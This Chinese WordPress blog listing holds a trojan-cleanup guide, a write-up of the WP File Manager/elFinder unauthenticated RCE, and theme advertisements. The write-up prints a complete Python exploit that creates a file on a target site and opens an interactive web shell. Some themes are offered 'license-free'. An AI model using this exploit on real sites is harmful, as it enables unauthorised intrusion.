2021-3-17
WordPress清理.ico木马详细教程

WordPress清理.ico木马详细教程

通过Google搜索网站访问的时候,会跳转到其他网站;直接通过网址访问网站的时候,不会跳转,隐蔽性极强 网站根目录的index.php和wp-config.php文件被插入 @include 代码加载恶意文件 网站很多目录会多出一些随机命名的php文件以及 .ico 文件 网站主题或插件会被插入恶意代码,并且带有特征码 Array();global 倡萌在大概2年前就遇到过这类木马,如果想彻底清理是非常麻烦的,但凡一个恶意的文件未清理干净,都可能触发再次感染,因为攻击者会不定时访问他投放的恶意文件(通过远程直接访问或服务器定时任务触发),如果这个恶意文件存在,就会再次执行。 以下分享一下清理该类木马的操作步骤。由于木马文件很多,靠人工是很难找到所有恶意文件的,所以要求通过ssh登录服务器去执行操作命令批量查找,也就是说,如果你的是一般的虚拟主机,通常没有ssh操作权限,无法按照本文命令执行。 首先,通过SSH登录服务器,或咨询你的主机商。 第1步:删除所有可疑的 ico 文件 #查找ico格式的文件 find . -name '*.ico' 进入到网站所在的根目录,执行上面的命令,就看已查找到所有 ico 格式的文件,这些文件的名称一般是随机的,或者带有点号.开头的,删除它们! 第2步:检查包含特征码 Array();global 的所有文件 #检查所有php文件是否包含木马的特征码 Array();global find . -type f -name '*.php' | xargs grep -l " *Array();global*" 攻击者一般会在主题或插件的某些文件插入上面的恶意代码,通过上面的命令可以找到包含这个特征码的文件,然后下载它们,并删除整段恶意代码。注意不要删除这些文件,因为文件包含了正常功能的代码。 第3步:查找通过 @includes 引入恶意文件的代码 攻击者一般会在网站根目录的index.php和wp-config.php文件被插入 @include 代码加载恶意文件,所以我们要先删除这两个文件开头的 @include 部分的代码。 然后可以通过下面的命令去查找包含了 @include 的php文件,逐一检查确认是否有问题。 #检查所有php文件是否包含@includes find . -type f -name '*.php' | xargs grep -l " *@include*" 第4步:查找更多可疑的PHP文件 如果你的网站有访问日志,通过日志去查找上面找到的包含恶意代码的php文件,就会发现还有很多其他恶意文件,如下图所示: 通过分析,发现这些恶意文件的名称都是8位数随机字母命名的,所以我们可以通过下面的命令,找到所有8位字母命名的php文件,只要名称不是规则的英文单词,就下载下来检查,通常都是木马文件。 #检索出所有8位字符命名的php文件,随机命名的文件极为可疑文件 find . -type f | egrep './[a-z]{8}\.php' 第5步:检查静态文件(images、css、js)等目录的php文件 通常来说,这些静态文件所在的目录是不会有php文件的,即使有,也可能是一个空白的或者只有一两句话的index.php文件。通过下面的命令,我们可以找到这些目录中包含的所有php文件。 #检查静态文件所在目录是否有php文件,查看文件大小判断是否可疑 find . -name '*.php' -exec ls -l {} \; | grep "uploads" find . -name '*.php' -exec ls -l {} \; | grep "images" find . -name '*.php' -exec ls -l {} \; | grep "css" find . -name '*.php' -exec ls -l {} \; | grep "js" find . -name '*.php' -exec ls -l {} \; | grep "assets" find . -name '*.php' -exec ls -l {} \; | grep "javascript" 然后看下文件的大小,通常小于100字节的index.php都是正常的,大于100字节的就可疑了,下载它们进行检查。 第6步:检查服务器的定时任务 正如前文提到的,有时候攻击者会在服务器添加定时任务来执行恶意文件。我们可以通过下面的命令查看和修改服务器的定时任务: #查看服务器定时计划是否有异常 crontab -l #编辑定时任务 crontab -e 第7步:更新WordPress核心、主题和插件 由于我们不知道通过上面的步骤能否彻彻底底删除所有恶意文件,所以,建议大家手动更新WordPress核心、主题和插件, 第8步:修改一切账号密码 我们不清楚攻击者是否收集了我们的账号信息,所以建议修改所有账号密码: 主机商网站登录密码 服务器SSH密码、FTP密码 网站mysql密码、phpMyAdmin密码 网站管理员密码等等 第9步:安装一个WordPress安全插件 安全无小事,我们到目前为止,仍然不知道攻击者利用了什么漏洞进行挂马,所以建议大家安装一个WordPress安全防护插件来增加一些保护。 ...
Wordpress 1200次浏览 0条评论
2020-10-23
WordPress文件管理器插件0day漏洞解析

WordPress文件管理器插件0day漏洞解析

文章来源:网友投稿 原创投稿作者:ordar123 昨天好多安全平台发布了WordPress插件WP File Manager的0day漏洞预警,然后我怀着好奇的心情解析了一波,花了些时间总算是解开了这个漏洞的神秘面纱。 从预警中可以看到漏洞在/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php,然后里面的关键代码说实话我一开始没看懂,大概意思就是两个文件包含,然后下面run elFinder。 为了弄懂这个我下载了WP File Manager插件6.0版本,下载地址:https://wordpress.org/plugins/wp-file-manager/advanced/然后搭建了一个WordPress5.3.2,用phpstrom调试审计这个插件。 先看了两个文件包含,其中一个./vendor/autoload.php文件是不存在的,另一个autoload.php也没什么特别的东西。然后往下看,在然后我被41行这个给误导了 因为断点调试到这一行,就会跳转到一个叫elFinderConnector.class.php的文件里,然后在这个文件160行发现exec()函数,我以为关键点就在这里,然后一直研究这个函数,然后并没有什么实际发现。。。 然后 我开始怀疑人生,可能是我太菜了吧,挖不到漏洞,别人都说了这里有0day我都挖不到,我也太菜了吧。。。 当我快要放弃的时候,我又看了一眼漏洞预警,其中几个字打开了我的思路,“这段代码来自elFinder项目”,这个意思是不是说WP File Manager插件使用了elFinder项目的代码,然后elFinder有漏洞。 于是,我又去百度elFinder漏洞 emmmmmmm。。。。。竟然真有漏洞,还是个CVE,CVE-2019-9194漏洞原理啥的没细看,这里贴一下https://xz.aliyun.com/t/4444然后我就找找有没有poc可以用,从exp-db上搜索elFinder,发现一个远程代码执行的链接,打开看看。 发现里面的存在漏洞的文件connector.php跟预警的文件connector.minimal.php挺像的,因为connector.minimal.php是示例文件所以是示例名,实际上正式项目要改成connector.php。应该是这个意思 然后就下载这个poc来验证我搭建的环境。 因为前面说了那个WP File Manager插件的作者直接搬运了elFinder的代码,所以连示例文件的名字都没有改,所以要稍微修改一下poc,将connector.php改成connector.minimal.php,然后将一句话改为eval,同时为方便调试将print的注释去掉 下面是漏洞验证环节: 可以看到在wp-contentpluginswp-file-managerlibfiles目录下成功生成了文件,内容为一句话。与漏洞预警中说明的目录是一样的。 以上操作都是在未登录的情况下,也就是说是未授权RCE。这里贴一下poc #[+] Author: TUNISIAN CYBER #[+] Title: elFinder 2 Remote Command Execution (Via File Creation) Vulnerability #[+] Date: 06-05-2015 #[+] Vendor: https://github.com/Studio-42/elFinder #[+] Type: WebAPP #[+] Tested on: KaliLinux (Debian) #[+] Twitter: @TCYB3R #[+] Time Line: # 03-05-2015:Vulnerability Discovered # 03-05-2015:Contacted Vendor # 04-05-2015:No response # 05-05-2015:No response # 06-05-2015:No response # 06-05-2015:Vulnerability published import cookielib, urllib import urllib2 import sys print"\x20\x20+-------------------------------------------------+" print"\x20\x20| elFinder Remote Command Execution Vulnerability |" print"\x20\x20| TUNISIAN CYBER |" print"\x20\x20+-------------------------------------------------+" host = raw_input('\x20\x20Vulnerable Site:') evilfile = raw_input('\x20\x20EvilFileName:') path=raw_input('\x20\x20elFinder s Path:') tcyber = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(tcyber)) create = opener.open('http://'+host+'/'+path+'/php/connector.minimal.php?cmd=mkfile&name='+evilfile+'&target=l1_Lw') print create.read() payload = urllib.urlencode({ 'cmd' : 'put', 'target' : 'l1_'+evilfile.encode('base64','strict'), 'content' : '' }) write = opener.open('http://'+host+'/'+path+'/php/connector.minimal.php', payload) #print write.read() print '\n' while True: try: cmd = raw_input('[She3LL]:~# ') execute = opener.open('http://'+host+'/'+path+'/admin/js/plugins/elfinder/files/'+evilfile+'?cmd='+urllib.quote(cmd)) reverse = execute.read() print reverse; if cmd.strip() == 'exit': break except Exception: break sys.exit() ...
网络安全 1960次浏览 0条评论
2020-10-11
WordPress摄影相册图片网站模板

WordPress摄影相册图片网站模板

是是一个响应整洁和轻量的WordPress主题风格,为拍摄艺术创意原创者而。 选用全新的WordPress技术性搭建。适用自适应网站,因而在全部机器设备上看上去都非常好。 此款模板特别适合喜欢摄影的朋友, 可以搭建下来看看,模板飞车的整洁漂亮。 对seo优化效果也非常的好。 ...
Wordpress 948次浏览 0条评论
2020-10-11
WordPress响应式导航主题风格模板

WordPress响应式导航主题风格模板

爱导航是一款原创品牌开发设计的WordPress网址导航大全主题风格,适用建立好看、强劲的导航栏类网址。这款导航栏主题风格的主页选用模块化,能够加上不一样连接归类下的连接,每一个控制模块都能够挑选是不是显示信息连接标志、连接叙述,能够设定要显示信息的连接数量、每列要显示信息的连接数、题目大小、连接打开,这些。 爱导航主题风格内嵌强劲、实用的连接管理方法作用,不用一切第三方软件就可以应用。假如您正期待构建一个好看、空气、技术专业的网址导航大全网址,那麼这款爱导航WordPress主题风格会是一个很好的挑选。 爱导航WordPress主题特色 全新自适应网站设计(完美兼容电脑、平板、手机等各种设备) 强大的首页链接模块:1-15列链接排版,多种展示模式任你设置 强大的主题设置面板,可直接从网站后台设置和修改主题的各个细节 首页、文章列表页、文章内容页、右侧边栏均可设置广告 全自动生成文章缩略图,激活主题即可自动完成 无限主题颜色,可任意切换 移动端专属导航菜单 支持专题功能 文章列表展示多图 文章列表展示广告 文章页支持社交网站分享 文章页展示相关文章 文章页展示作者说明 文章页展示上/下一篇文章 全宽页面模板 完美兼容IE9+、Chrome、Firefox、Safari、360等主流浏览器,针对mac,OS等Retina屏幕优化显示 100%,WordPress代码标准验证通过 100%,W3C验证通过 主题代码经过特殊优化,使用最少的主机(服务器)资源 主题完全开源,无任何隐藏代码,零广告,零风险 ...
Wordpress 778次浏览 0条评论
2020-10-10
WordPress网址导航主题

WordPress网址导航主题

爱导航是一款WordPress网址导航大全主题风格,适用建立好看、强劲的导航栏类网址。这款导航栏主题风格的主页选用模块化,能够加上不一样连接归类下的连接,每一个控制模块都能够挑选是不是显示信息连接标志、连接叙述,能够设定要显示信息的连接数量、每列要显示信息的连接数、题目大小、连接打开,这些。 爱导航主题风格内嵌强劲、实用的连接管理方法作用,不用一切第三方软件就可以应用。假如您正期待构建一个好看、空气、技术专业的网址导航大全网址,那麼这款爱导航WordPress主题风格会是一个很好的挑选。 爱导航WordPress主题特色 全新自适应网站设计(完美兼容电脑、平板、手机等各种设备) 强大的首页链接模块:1-15列链接排版,多种展示模式任你设置 强大的主题设置面板,可直接从网站后台设置和修改主题的各个细节 首页、文章列表页、文章内容页、右侧边栏均可设置广告 全自动生成文章缩略图,激活主题即可自动完成 无限主题颜色,可任意切换 移动端专属导航菜单 支持专题功能 文章列表展示多图 文章列表展示广告 文章页支持社交网站分享 文章页展示相关文章 文章页展示作者说明 文章页展示上/下一篇文章 全宽页面模板 完美兼容IE9+、Chrome、Firefox、Safari、360等主流浏览器,针对mac OS等Retina屏幕优化显示 100 WordPress代码标准验证通过 100 W3C验证通过 主题代码经过特殊优化,使用最少的主机(服务器)资源 主题完全开源,无任何隐藏代码,零广告,零风险 ...
Wordpress 850次浏览 0条评论
2020-10-10
wordpress资源站主题Ripro子主题免授权

wordpress资源站主题Ripro子主题免授权

更新记录 4.0版本更新内容 4.0新增功能 1:新增工单系统功能(服务单系统) 2:新增自定义分类栏目文章缩略图高度功能 3:新增全站底部游客提示登录功能 4:新增首页全屏幻灯片统计模块 5:新增栏目列表页搜索框(搜索当前分类文章) 6:新增导航菜单栏固定按钮 7:新增内容页面提示框效果、文本框效果、按钮效果、内容隐藏效果、内容收缩效果 8:新增资源下载内容页复制链接咨询功能 4.0主题优化 1:优化对接最新版ripro主题 2:优化内容页 3:优化底部友情链接ui 4:优化友情链接可选全站底部展示/只在首页底部展示 5:优化全站导航菜单栏 6:优化CMS模式文章标题显示两行 7:优化资源下载内容页百度收录按钮可选开关 8:优化普通内容页百度收录按钮可选开关 3.0版本更新内容 3.0新增功能 1:添加520左上角悬浮挂vip 2:添加文章内容常见问答 3:添加三合一幻灯片模块 4:添加列表资源标签(推荐、精品、独家、最新、已测试)后台发布资源时选择! 5:添加手机端底部菜单 6:添加手机端cms模块按钮 7:首页CMS模块新增快捷菜单按钮 3.0主题优化 1:优化列表资源时间、浏览量、价格 2:手机端菜单栏美化错位 3:升级更新RIPRODL下载插件 4:修复开启下载插件不显示评论 3.0新增页面 1:新增快讯公告页面 2.1版本更新内容 2.1功能修复: 1:紧急修复前台提示授权信息重复 2:修复WP下载页面无法创建 3:修复下载插件界面显示错位以及UI美化 2.0版本更新内容: 2.0新版新增授权机制,保护正版用户权益(将要授权的域名发给在线客服,7*24小时在线授权) 正版用户个人名下所有域名无限制授权使用,本站所制作的jizhi-chlid主题,不限制域名,数量,但仅限终身SVIP会员本人使用,外泄主题 包将取消终身SVIP资格。 2.0功能修复: 1:紧急修复特定情况下支付宝用户已付款商户支付宝未到账(强烈建议立即升级新版) 2:修复特定情况下无法登入账户 3:修复特定情况下vip资源普通用户也能下载BUG 4:修复全局css错位 5:修复自助申请友情链接不能提交问题 2.0功能新增: 1:新增wordpress下载页面 2:新增栏目列表/首页资源类型判断图标开关 3:新增资源下载模块(原创作者正版授权,放心使用,建议升级) 4:新增优化资源下载模块后台全功能设置 5:新增文章内页彩色渐变框 6:新增全屏动态幻灯片 7:新增内容页是否显示百度收录按钮 8:新增首页最新发布标题 2.0主题优化: 1:内容页文章优化 2:手机端适配优化 1.2版本更新内容: 1:新增内容页底部“售后服务”模块(对接后台设置) 2:新增内容页底部“联系我们”模块(对接后台设置) 3:升级VIP页面对接后台设置 4:申请友链页面对接后台设置 5:站长导航页面对接后台设置 6:首页CMS模块-风格2对接后台设置 7:修复升级VIP页面背景图片丢失   8:修复用户菜单小图标丢失 ...
Wordpress 1669次浏览 0条评论
2020-10-10
wordpress图片类模板CX-UDY3.1主题免授权

wordpress图片类模板CX-UDY3.1主题免授权

【适配】适配新版WordPress评论框js调用; 【增加】增加一种幻灯片UI(左轮播右边显示4个文章位)效果; 【优化】优化自动分页与VIP图片或适配的兼容性(部分图片需要VIP才能查看功能支持跨分页使用); 【修复】修复部分情况下浏览器占用GPU过高的问题; 【修复】修复顶部不吸附的设置下,用户中心logo无法点击的问题; 【优化】点卡充值后台可以选择卡号卡密同时验证或者仅输入卡号即可充值; 【新增】首页幻灯片下面增加一个广告位; 【优化】微信分享二维码改用js脚本生成提高稳定性和节约服务器性能; 【优化】底部网站信息统计条支持自定义统计项; 【新增】增加商务黑色调配色选择(需安装专用扩展包); Version:3.0.2 – Date:2019-07-11 【增加】会员折叠菜单中增加wp后台入口按钮; 【增加】双栏布局文章页meta栏增加简洁风格,后台可切换; 【重构】管理中心会员管理功能重构,支持全字段搜索和会员筛选功能; 【优化】LOGO扫光效果增加开关; 【优化】优化图片灯箱浏览功能,增加放大缩小和自动播放等功能; 【修复】筛选移动端部分设备显示错位问题; 【修复】修复筛选逻辑的一个错误; 【修复】关闭会员功能是移动端依然显示登录按钮的问题; 【修复】修复部分情况下移动端菜单不在顶层的问题; ...
Wordpress 1208次浏览 0条评论
微信二维码